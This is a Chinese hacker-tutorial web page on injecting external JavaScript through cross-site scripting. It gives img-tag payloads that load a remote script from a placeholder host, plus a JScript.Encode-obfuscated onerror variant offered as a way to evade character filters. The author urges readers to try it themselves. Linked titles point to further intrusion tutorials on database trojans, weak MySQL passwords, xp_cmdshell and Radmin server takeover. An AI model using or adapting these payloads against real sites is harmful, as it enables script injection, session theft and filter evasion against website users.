手机
当前位置:查字典教程网 >网络安全 >黑客教程 >教你如何在XSS中再插JS
教你如何在XSS中再插JS
摘要:字符过滤怎么办?用Encode加密后就无敌了~未加密前:加密后:嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一...

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前:

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 加密后:

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

【教你如何在XSS中再插JS】相关文章:

如何多开QQ游戏大厅

教你数据库挂马

教你如何解决无法显示验证码的问题

教你如何通过Mysql弱口令得到系统权限

教你SQLSERVER扩展存储过程XP_CMDSHELL的简单应用

教你如何破别人的ASP木马密码

教你如何手工注入猜解语句

教你黑客侦察和隐藏IP地址的方法

教你如何在远程3389终端主机上直接Copy文件

教你如何通过Radmin拿服务器

精品推荐
分类导航